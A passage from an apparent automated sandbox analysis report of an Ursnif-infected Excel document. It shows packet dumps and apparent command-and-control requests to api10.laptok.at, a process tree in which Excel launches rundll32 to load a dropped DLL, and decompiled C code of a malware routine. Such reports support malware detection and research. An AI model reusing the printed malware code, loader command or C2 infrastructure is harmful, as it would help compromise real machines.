2000PE?ww:,KN{{LxzSxaABB/ayNP4]t+>p/:JOu[k%}{~&uiQ8+gghG#8RkrZ<h%wCBps3C4R6Q@'/YpM#BBfO_^[@#OeQzxuK%]tR2AC;aj/Z#m7~5_STxq\y-D.b6nn2mc:K`uR\|` vV72ByT8Cb9`3GZ>{j-T4)kQG7~YZCJrUQ(ESsN9*O4mub(Ll\4[PI/BB'vmXb=iMZK2Zmw){s^#jLl:~8x^$M.Mvi1.UAb#Xl6q5%08]s/\ZvSoUfSfxK8M\|lE\!hxu-Y%{VX`\|0f\|rhv~FKGJ# 6ofqy:)oQP%eX,aD2:0'DTDMTF-\u3X>6Y\PNa\|[6uu%H@fm',Lq${\#g%~j~9S0,ygm\d\|=^or!=\E
Feb 9, 2021 18:44:02.714873075 CET	5638	IN	Data Raw: 80 0f 92 5f 01 af 2f e8 63 bd d6 31 55 49 80 b2 20 82 a8 9e 26 4f cf ce 9f 11 7e 7d b8 67 ec 86 1b 30 f4 4e bc cf 7b 7b 54 b1 52 a3 e0 43 61 22 11 3c fe 6f 4d 93 16 8a 43 de fe 4a d0 1a 1f d9 25 cc e2 5b ef bc 4c 14 ca 53 dc 44 81 8f dd d7 aa 61 Data Ascii: _/c1UI &O~}g0N{{TRCa"<oMCJ%[LSDaxB+I[]<Fz7" t?]mFY_aC_x>kc![1s9<hc3[^14A]B>lA&?1re',KdtO$f7>
Feb 9, 2021 18:44:02.714900017 CET	5639	IN	Data Raw: 0c 82 72 e0 19 5f e3 44 85 5c 90 06 91 e9 0a eb e0 b7 b1 68 e3 97 7e bf fb ac 73 5d d5 13 92 64 a8 6f d4 cb 40 53 9c b2 e5 9d 56 ac b4 27 93 35 8c 5d 7e d8 45 4f b3 1e 70 2f 00 f5 ac e9 43 75 51 18 0c 9f d0 00 7d be c3 68 63 24 c3 ba 4d d3 02 6e Data Ascii: r_D\h~s]do@SV'5]~EOp/CuQ}hc$Mn2/'3$WGN}l=jO3"z87N]lR NU(f~!9YK2\SSNPqbC\|D$8tK])4^X&I)!h.
Feb 9, 2021 18:44:02.714922905 CET	5641	IN	Data Raw: 8b 10 33 eb af 6d 9c ea 09 59 6c 94 ae 9b 58 f9 11 1f fc 34 c0 a7 67 8e df f0 9f 1e 03 1f 3f 55 bb e0 a3 83 a1 7b d8 33 e6 ee 0b e0 71 5e 54 db 3c ab 1b f0 6f df d2 58 e0 44 3e 11 90 4d c6 5c a5 3d cb 9a ff 2a 4e f9 a1 6d 5e a3 35 3a 26 d0 2f c8 Data Ascii: 3mYlX4g?U{3q^T<oXD>M\=*Nm^5:&/TjyEhyAK9&ecd>?f5YPU9S149J Hywi/a](k2!d2'3gkz$nB2[1BThJ
Feb 9, 2021 18:44:02.714943886 CET	5642	IN	Data Raw: 4e 77 2b 5f e6 6a 66 ce 4a 45 7e 08 13 a8 08 08 c3 dd 91 31 7e bd 0e 89 88 f8 c2 fb 87 bb 37 a2 d8 17 e0 11 92 c8 42 4e c8 6c e7 a3 90 e0 ae 2c c9 0f 20 a4 c9 f8 46 58 56 ac 88 78 57 4f 8d 38 53 49 8e 0f fd 66 28 39 c0 9d da 77 46 96 c7 e2 d7 64 Data Ascii: Nw+_jfJE~1~7BNl, FXVxWO8SIf(9wFdosL#\vTZrVJK3pppF y"KOtIVS>mlVkv1$iM&2luO=h0~(,uPe/nKH9[n8>xU]AwSz4
Feb 9, 2021 18:44:02.714966059 CET	5643	IN	Data Raw: da 2f 9b 04 32 34 71 62 ba 08 ac 3f 41 47 db bb ef 4d ea 5e 80 65 af 00 60 1b ce d0 c1 e7 d3 31 93 af 2e e4 fd 45 98 af 0c c1 58 d6 61 0d ca 74 1b 53 ac ed 70 a6 b9 8c 81 a6 4a e1 4c 88 a9 90 1d a5 85 6b 7d 7e 14 e9 2a eb f3 7c c1 ae f5 cc f4 23 Data Ascii: /24qb?AGM^e`1.EXatSpJLk}~*\|#6@:2SH\t@k7\|W`f;OPF@_fPDN~,mt!sm+W(A6c#:rnM~mE,VTlBrKN6#Xz]"{:?Bye
Feb 9, 2021 18:44:02.753659964 CET	5645	IN	Data Raw: 8f 97 67 8a cf 65 17 1d f4 31 40 14 5d ec 6b 88 52 37 64 27 96 4a 07 93 22 97 f5 33 b7 74 da 58 f4 6a 9b 4b 7c c8 93 c8 cb d9 c1 87 87 8a 35 10 9c 37 ed 29 34 a1 57 71 83 a9 e3 67 c9 58 59 43 e0 15 d2 14 c3 7e 4b df bc e3 35 9b 8a df 9a 78 33 64 Data Ascii: ge1@]kR7d'J"3tXjK\|57)4WqgXYC~K5x3dUcwu_f2n1y?6XmV_Civ<U{}sy?D^\w_0;j'r!Ng_s3M^(h)h#g6[B9>ka6_@(T(r}cLKT
Feb 9, 2021 18:44:02.753686905 CET	5646	IN	Data Raw: c9 bf 92 fe e6 a1 9a 46 6c 86 85 74 60 ee 1c af eb 5e 15 da ab 3a 27 20 80 ad 23 63 0d 9c 2b 4e 7d 53 37 67 8c 3e 27 e8 25 44 cd 85 71 1d da 74 1e 16 60 f3 cc db 39 cc 85 76 19 ab d4 fa dd a4 da 6f a4 f8 55 42 7b 6e ce cc c8 69 29 f9 a0 92 5c 79 Data Ascii: Flt`^:' #c+N}S7g>'%Dqt`9voUB{ni)\yR! \| [@D^8_LE8{Ls7TB\.?si\$%-q'Y\:u9@Xu&/'4i0A"gZ} Y#QT*
Feb 9, 2021 18:44:02.753699064 CET	5648	IN	Data Raw: 25 25 79 1e b7 0d d5 00 d4 af f9 a4 68 9b 04 2b 5a bc df e9 8d a5 78 41 73 25 4e a4 2b 40 c6 52 b6 00 84 1a ec 3d da b1 e7 15 a4 4f 10 9d ae f4 45 9a 71 04 88 43 7b d9 04 30 92 62 33 23 76 de 45 bf 62 d4 e7 82 d9 c6 8a 73 19 34 57 e2 23 bb 0e 6e Data Ascii: %%yh+ZxAs%N+@R=OEqC{0b3#vEbs4W#ntUstpc\<h_GbU{<jSRQ 8LFGHZ2ymD"hqbI5(.!J/EyC3&?:Ct(.A\|e3>Q\|u\Q`\v
Feb 9, 2021 18:44:02.753719091 CET	5649	IN	Data Raw: 64 49 47 d2 cd ba c2 81 f7 ea 03 28 89 7d ae ca c4 94 4f ea 18 1b 3a 66 c8 4f 21 ce 98 66 43 a8 d1 b0 cf 20 bd 36 34 03 4a 43 ee 34 53 7a 0d c1 d1 60 f3 0d ad e7 d0 57 32 be 0d 3b 39 0b a7 f6 a0 9f 33 90 14 82 4e d6 d3 87 19 97 da 04 91 2e f5 27 Data Ascii: dIG(}O:fO!fC 64JC4Sz`W2;93N.'T,cW`]{L/AN_M;F\cEN;%$?5zDAFk_NN0PQ=f9!Hu#QeI>fvB.WG.
Feb 9, 2021 18:44:02.790873051 CET	5651	IN	Data Raw: 5a c3 32 23 ce f5 08 3f 77 29 82 eb c9 64 31 b0 f0 90 26 8f 58 c3 7d 6a 36 2b ab 68 9a 00 89 1c a2 12 cf f7 5a 72 09 22 46 cc 08 2d 14 09 24 ec f1 18 46 ff 30 9a cc 08 c6 63 76 24 f6 e8 21 5b 48 42 ac 29 ac d1 2a 3e 0a 8b 6c df b0 39 9f a7 1d 85 Data Ascii: Z2#?w)d1&X}j6+hZr"F-$F0cv$![HB)>l9go($JP4?=1`cly`vU%k3_M\|{ `~4VO={z(=_1i~eY\|]Y >guG:#&KJ{1D

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49758	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2021 18:44:03.194701910 CET	5904	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Feb 9, 2021 18:44:03.299371958 CET	5905	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 09 Feb 2021 17:44:03 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49759	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2021 18:44:04.330867052 CET	5906	OUT	GET /api1/quWyI8WCkgN/SXUvWGfiUm7T0f/lzSlHf7sO503xATuzHkPG/Uh6KISBL5d4ngtXF/8CCWBl9aRux0ggg/WjpeRnlHlxQpgYHWF7/SRgr07KRV/r5lQqK3B6jZkHZiIL4cT/yujdqTpvuL8V1NlvglB/sTzNC3Gtg_2Bwr4uzl4_2F/AC089ktgtaMkN/4Kgt2RLr/Ke14XkQchJOlvOHrYVkVyXU/P0CMvsMir5/NwrpznNArerCa8bkI/55ua2Ge0fpbQ/9kzo82khbwL/WEPiqQPRb97B8a/81xN3oY2Fv8ECPICx_2Be/nWcE6nEvng8OxAW2/XsEKKCKa1AcTuvo/k HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Feb 9, 2021 18:44:04.711205959 CET	5907	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 09 Feb 2021 17:44:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 35 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 96 c5 81 84 00 00 c4 0a e2 c1 e2 f0 c4 dd 9d 1f ee ee 54 7f d7 43 26 13 99 f0 fa 8e e0 05 f9 06 ae 0f 68 b1 0c 60 df 25 66 de 52 7a 49 54 a7 42 46 cb 3c b8 bb a0 73 1c dc ec 1d 27 cf af 0f 9c 5f bb 88 f2 1d f3 5c b4 ef 7c 46 a5 a9 87 37 9a d8 2d 51 5c fb 77 3a c8 35 e9 8d a1 65 21 50 31 7b 23 8a 89 53 2f 0f 84 ae 6a 8f d8 a5 9d 60 9c 6b f8 87 11 db 3d 18 f2 91 df 0c d4 cb c9 e5 4f bc 7c 6c c1 18 57 54 15 f8 d2 4f ce 23 6f 68 6c a2 8b 3f 23 9e ef 67 27 7b 34 f0 0d 8c fd 43 72 87 22 db dc 28 83 3c 5a 98 86 32 35 0f e8 bc 17 44 41 17 9d 72 67 b8 1f 39 4e a7 c1 ff 04 d4 da 5e c3 bb af 45 c8 ec a1 17 97 c4 56 eb 86 47 eb a2 61 91 34 8b 97 cb 4f 20 90 e2 7d a1 85 38 bd 9b 7c 11 14 ba ea a5 84 77 d7 70 d3 c5 c0 e5 50 02 b4 a7 57 4e 85 76 ba 47 f4 f4 79 65 05 b9 07 a9 8b 8e 4b 51 77 71 1f 0c 16 ba aa 4b b4 50 eb 25 53 46 52 ef b0 b5 96 cd 2b 69 c7 6b 75 19 b6 99 cf 00 8f 17 98 a7 93 8e 35 4a 30 fd 13 7e 91 e4 37 64 bb d4 a6 a3 e8 2d 91 01 fe 32 20 8d 05 66 49 c8 60 16 56 f2 60 9e a4 76 1f 83 73 b8 f2 3a 7e c3 2b 3d 61 87 66 d9 92 4f e4 89 7d 86 61 ef 51 5d d3 42 cd a3 47 c6 b7 1f 41 3c 12 f6 d9 31 e4 ca c2 0a c5 94 31 27 af a3 80 db 5e 36 e0 5e 2a ba 87 e2 31 2d d7 40 a8 6b f0 52 f3 4d 48 ae 0a 77 e0 6e 70 c1 d4 03 16 01 59 b2 88 ae ee 8f c6 9e 48 80 a6 5d 8e de 61 6e ef 2b 9d 5f 97 47 10 e2 8a fe 00 5c 2e 85 8a 44 73 5a 1d 48 9a 78 18 cc 7a 9e b5 c1 a0 ae 16 56 79 bf 97 c5 ed b8 86 9e a3 ad de b2 5f db 21 65 04 61 3b 9c ad 38 64 b7 c3 ad b3 42 97 eb a1 3c ed 46 f0 36 ae be 5c 19 c2 50 fc 69 73 02 4d 0c 64 dd 73 79 15 fa 85 7a 95 fa bc 35 9a 00 22 99 19 e6 2e e1 34 1a 49 96 e4 92 75 64 dd b9 a7 1e 64 df c5 27 3c 3b 3f 05 ed 4c a9 6f bb b5 d6 77 3d ee 49 ec 50 b4 eb dd b4 bd 37 a8 52 5e cc da fe 93 81 da f4 fd 76 65 8f 79 f5 c3 1c 69 81 12 2b 54 29 11 35 22 d5 68 43 6e 7b e9 7b 68 2b ed c4 95 a8 45 84 ac c3 ac 38 15 cb af 43 95 f3 81 99 14 a7 6c 42 0a a3 79 2e af a4 c4 81 c1 54 28 67 eb 4d 01 c0 f6 c3 45 c2 16 37 56 90 37 e0 f4 23 90 c6 ed da 3a 33 10 1c 18 90 4d ba d5 a7 48 c6 42 42 83 3e ef 33 e4 d6 19 29 7b 94 ef 83 d2 29 cc 0f 89 59 6d f8 8e c9 be 9d 05 3b dc 6d 19 58 04 a0 39 48 19 93 0b b6 c9 20 3a 6b 76 4e ce 15 61 49 a0 bd 7a b0 34 a5 85 73 0b d3 72 16 af fa 8d 11 89 be e2 23 24 a7 e0 36 c8 c8 b9 0b 5d e8 6d 0c 29 5c de 7c 0a a9 6a 00 30 fe 2f 55 67 50 55 50 dd 43 84 a1 c2 1f f1 12 ef 97 22 13 1f 90 36 e9 df 61 a8 0a c3 4e 38 fa ac ca 1a 92 e7 2a 73 e2 e1 0b 14 44 af d0 e9 bb 07 b2 7d 6f c7 62 06 03 ab 22 3d fd 18 23 1e 44 96 5f b4 31 ab 77 37 5e 0b 67 94 28 69 51 75 2a fb 24 99 47 8d ae ce 9f fb 05 cb c7 6c f7 1b b1 53 f0 23 a5 75 ac 32 dc 84 8d 24 da 1f 33 bc d6 91 10 cf 3c 4a 34 f2 13 4a 0d 3f 92 c6 37 46 f9 6a 02 1f 82 e6 d5 a9 50 46 89 d1 cb e1 41 e1 b5 90 ba ad 24 3a 6f ce 14 a0 9e 4f 0e 4e 1a 91 dd dd 6e 31 45 55 5d 72 1d ed a8 68 51 78 d6 44 f4 b1 0e f1 0e 7f e5 50 c4 47 d7 be 0d bc 46 04 93 af 47 46 93 23 08 5a 70 69 03 c1 3d 2b 57 e7 b4 17 cf 7d e4 43 c9 09 91 eb 2e 68 d1 26 f4 6e a3 bd 73 36 54 b4 ca 74 d9 35 f5 14 22 fb 86 01 b7 bc 49 ad 1f 3d 26 cf b4 3e 4b ee 71 26 50 56 ab 1f 66 73 c1 86 5e Data Ascii: 75fTC&h`%fRzITBF<s'_\\|F7-Q\w:5e!P1{#S/j`k=O\|lWTO#ohl?#g'{4Cr"(<Z25DArg9N^EVGa4O }8\|wpPWNvGyeKQwqKP%SFR+iku5J0~7d-2 fI`V`vs:~+=afO}aQ]BGA<11'^6^1-@kRMHwnpYH]an+_G\.DsZHxzVy_!ea;8dB<F6\PisMdsyz5".4Iudd'<;?Low=IP7R^veyi+T)5"hCn{{h+E8ClBy.T(gME7V7#:3MHBB>3){)Ym;mX9H :kvNaIz4sr#$6]m)\\|j0/UgPUPC"6aN8sD}ob"=#D_1w7^g(iQu*$GlS#u2$3<J4J?7FjPFA$:oONn1EU]rhQxDPGFGF#Zpi=+W}C.h&ns6Tt5"I=&>Kq&PVfs^
Feb 9, 2021 18:44:04.711227894 CET	5908	IN	Data Raw: 10 b7 1c 51 90 44 5d e2 44 92 62 fd 44 61 d4 81 d2 1d 3b bc ac 6b bf 4f e3 f9 24 c4 97 c2 ac d2 f9 ba 79 e2 f6 c3 d1 24 ee 1f 18 b8 fa 82 0a dc df 46 68 f5 a6 52 14 36 0b 62 79 f3 59 0c 79 cf 3e a1 bd 9b 11 ed 13 28 3b 50 01 4e c8 83 2c 40 d4 9e Data Ascii: QD]DbDa;kO$y$FhR6byYy>(;PN,@* ?^R?W>?!wu&kWJ>LE_\GY>]_YWRuu?wU?"*(O\|;Q4KDhtLr(E,9slT+u\g-d%6i['\9r9H5

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 9, 2021 18:41:49.329449892 CET	192.185.16.102	443	192.168.2.6	49728	CN=urbandancecity.com CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Sun Jul 05 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019	Tue Jul 06 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB	CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	Fri Nov 02 01:00:00 CET 2018	Wed Jan 01 00:59:59 CET 2031
					CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Mar 12 01:00:00 CET 2019	Mon Jan 01 00:59:59 CET 2029

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 7052 Parent PID: 792

General

Start time:	18:41:39
Start date:	09/02/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0x10c0000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4536 Parent PID: 7052

General

Start time:	18:41:57
Start date:	09/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer
Imagebase:	0x13a0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6688 Parent PID: 792

General

Start time:	18:43:58
Start date:	09/02/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff721e20000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6764 Parent PID: 6688

General

Start time:	18:43:58
Start date:	09/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2
Imagebase:	0x310000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 4536 Parent PID: 7052 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	7.8%
Signature Coverage:	6.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	48

Executed Functions

Function 00A17DD8, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00A17DD8(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0xa1d22c; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0xa1d1f0, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0xa1d22c; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0xa1d1f0, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0xa1d1f0, _t146, _v20);
					goto L36;
				}
				_t136 =  *0xa1d22c; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0xa1d230; // 0x4a6a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0xa1e825; // 0x73797325
				_t83 = E00A199D3(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0xa1d1f0, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9");
					CloseHandle(_v32);
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0xa1d230; // 0x4a6a5a8
				_t16 = _t93 + 0xa1e846; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x00a17de1
0x00a17de7
0x00a17de9
0x00a17e03
0x00a17e07
0x00a17e0a
0x00a1807f
0x00a18086
0x00a18086
0x00a17e10
0x00a17e25
0x00a17e27
0x00a17e2b
0x00a17e2e
0x00a1806f
0x00a18079
0x00000000
0x00a18079
0x00a17e34
0x00a17e3f
0x00a17e44
0x00a17e49
0x00a17e4c
0x00a17e53
0x00a17e5a
0x00a17e5d
0x00a1805f
0x00a18069
0x00000000
0x00a18069
0x00a17e73
0x00a17e77
0x00a17e7a
0x00a17e7d
0x00a17e85
0x00a17e88
0x00a17e91
0x00a17e97
0x00a17ea1
0x00a17ea8
0x00a17ea8
0x00a17eba
0x00a17ec5
0x00a17ed3
0x00a17ed8
0x00a17edd
0x00a17ee0
0x00a17ee5
0x00a17eef
0x00a17ef2
0x00a17ef5
0x00a17f0b
0x00a17f0f
0x00a17f12
0x00a1805d
0x00000000
0x00a1805d
0x00a17f29
0x00a17f7a
0x00a17f3d
0x00a17f45
0x00a17f4a
0x00a17f58
0x00a17f61
0x00a17f6a
0x00a17f6a
0x00a17f78
0x00a17f78
0x00a17f7e
0x00a17f82
0x00a17f82
0x00a17f88
0x00000000
0x00000000
0x00a17f8a
0x00a17f90
0x00a18037
0x00a1803a
0x00a18047
0x00a18047
0x00a1804b
0x00000000
0x00000000
0x00a18040
0x00a18044
0x00a18044
0x00a18046
0x00a18046
0x00a18050
0x00a18057
0x00a18059
0x00000000
0x00a18059
0x00a17f96
0x00a17f98
0x00a17f98
0x00a17fab
0x00a17fb1
0x00a17fbc
0x00a17fbe
0x00a17fc2
0x00a17fc4
0x00a17fc4
0x00a17fc9
0x00a17fcb
0x00a17fcb
0x00a17fc9
0x00a17fd0
0x00a17fd4
0x00a17fd4
0x00a17fe4
0x00a17fe9
0x00a17fec
0x00a17fec
0x00a17fef
0x00a17ff9
0x00a18001
0x00a18006
0x00a18014
0x00a18014
0x00a18028
0x00a1802c
0x00a1802c

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,00A1D2E0), ref: 00A17E03
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00A17E25
memset.NTDLL ref: 00A17E3F

Part of subcall function 00A199D3: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00A17E58,73797325), ref: 00A199E4
Part of subcall function 00A199D3: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00A199FE

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00A17E7D
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00A17E91
CloseHandle.KERNEL32(?), ref: 00A17EA8
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00A17EB4
lstrcat.KERNEL32(?,642E2A5C), ref: 00A17EF5
FindFirstFileA.KERNELBASE(?,?), ref: 00A17F0B
CompareFileTime.KERNEL32(?,?), ref: 00A17F29
FindNextFileA.KERNELBASE(00A19865,?), ref: 00A17F3D
FindClose.KERNEL32(00A19865), ref: 00A17F4A
FindFirstFileA.KERNEL32(?,?), ref: 00A17F56
CompareFileTime.KERNEL32(?,?), ref: 00A17F78
StrChrA.SHLWAPI(?,0000002E), ref: 00A17FAB
memcpy.NTDLL(00A13FAE,?,00000000), ref: 00A17FE4
FindNextFileA.KERNELBASE(00A19865,?), ref: 00A17FF9
FindClose.KERNEL32(00A19865), ref: 00A18006
FindFirstFileA.KERNEL32(?,?), ref: 00A18012
CompareFileTime.KERNEL32(?,?), ref: 00A18022
